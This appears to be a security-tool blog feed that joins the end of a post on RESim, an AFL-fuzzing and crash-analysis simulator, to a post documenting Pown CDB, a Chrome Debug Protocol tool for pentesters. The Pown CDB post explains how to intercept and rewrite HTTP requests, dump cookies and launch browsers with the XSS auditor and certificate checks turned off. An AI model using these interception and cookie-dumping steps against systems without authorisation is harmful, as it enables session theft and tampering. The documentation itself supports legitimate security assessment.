RESim has been integrated with the American Fuzzy Lop (AFL) fuzzer. This fuzzing system injects fuzzed data directly into the application read buffer, simplifying the fuzzing setup and workflow. RESim automatically replays and analyzes any detected crashes, identifying the causes of crashes, e.g., corruption of execution control.

Please refer to the RESim User's Guide for additional information. A brief demonstration of RESim can be seen here: (https://nps.box.com/s/rf3n104ualg38pon6b7fm6m6wqk9zz50)

RESim is based on a software vetting and forensic analysis platform created for the DARPA Cyber Grand Challenge. That repo is here: https://github.com/mfthomps/cgc-monitor. A paper describing that work is at https://www.sciencedirect.com/science/article/pii/S1742287618301920 And a fine summary of the use of Simics in the CGC Monitor is at https://software.intel.com/content/www/us/en/develop/blogs/simics-software-automates-cyber-grand-challenge-validation.html

[1]Simics is a full system simulator sold by Wind River, which holds all relevant trademarks.



Cdb - Automate Common Chrome Debug Protocol Tasks To Help Debug Web Applications From The Command-Line And Actively Monitor And Intercept HTTP Requests And Responses

20 July 2022 at 12:30
By: Zion3R


Pown CDB is a Chrome Debug Protocol utility. The main goal of the tool is to automate common tasks to help debug web applications from the command-line and actively monitor and intercept HTTP requests and responses. This is particularly useful during penetration tests and other types of security assessments and investigations.


Credits

This tool is part of the secapps.com open-source initiative.

  ___ ___ ___   _   ___ ___  ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com

Authors

Quickstart

This tool is meant to be used as part of Pown.js but it can be invoked separately as an independent tool.

Install Pown first as usual:

$ npm install -g pown@latest

Invoke directly from Pown:

$ pown cdb

Library Use

Install this module locally from the root of your project:

$ npm install @pown/cdb --save

Once done, invoke pown cli:

$ POWN_ROOT=. ./node_modules/.bin/pown-cli cdb

You can also use the global pown to invoke the tool locally:

$ POWN_ROOT=. pown cdb

Usage

WARNING: This pown command is currently under development and as a result will be subject to breaking changes.

pown cdb <command>

Chrome Debug Protocol Tool

Commands:
pown cdb launch Launch server application such as chrome, firefox, opera and edge [aliases: start]
pown cdb navigate <url> Go to the specified url [aliases: goto, go]
pown cdb network Chrome Debug Protocol Network Monitor [aliases: net, sniff, proxy, mon, monitor]
pown cdb cookies Dump current page cookies [aliases: cookie]
pown cdb screenshot <file> Screenshot the current page [aliases: capture, shoot, shot]

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown cdb launch

pown cdb launch

Launch server application such as chrome, firefox, opera and edge

Options:
--version Show version number [boolean]
--help Show help [boolean]
--port, -p Remote debugging port [number] [default: 9222]
--xss-auditor, -x Turn on/off XSS auditor [boolean] [default: true]
--certificate-errors, -c Turn on/off certificate errors [boolean] [default: true]
--pentest, -t Start with preferred settings for pentesting [boolean] [default: false]

pown cdb navigate

pown cdb network
pown cdb cookies
pown cdb screenshot
Tutorials

Web Application Security Assessment

Let's explore how to use Pown CDB during a typical web app security engagement.

First, ensure that you have the latest pown installed:

$ npm install -g pown

If you have pown installed, make sure you have the latest version:

$ pown update

To get started with Pown CDB we need a Chrome browser instance (other browsers are also supported) with the Chrome debug remote interface enabled and listening on localhost:

$ pown cdb launch --port 9333

Once the chrome browser instance is running, hook it with the pown cdb network utility:

$ pown cdb network --port 9333 -b

The -b flag is used to start Pown CDB with a curses-based user interface:


Use key-combo shift + ? to get a list of available shortcuts:


As soon as you start using the browser, Pown CDB will record and display the traffic in the user interface. To intercept requests use key-combo ctrl + t.


Requests are captured and opened in your default shell editor ($EDITOR). Make the desired changes, save and quit. The original request will be replaced with your changes.
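
To wrap up a session, the other subcommands shown earlier can be pointed at the same instance; note that passing --port to them is an assumption based on the launch options above, not a documented flag for these subcommands:

$ pown cdb cookies --port 9333
$ pown cdb screenshot login.png --port 9333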


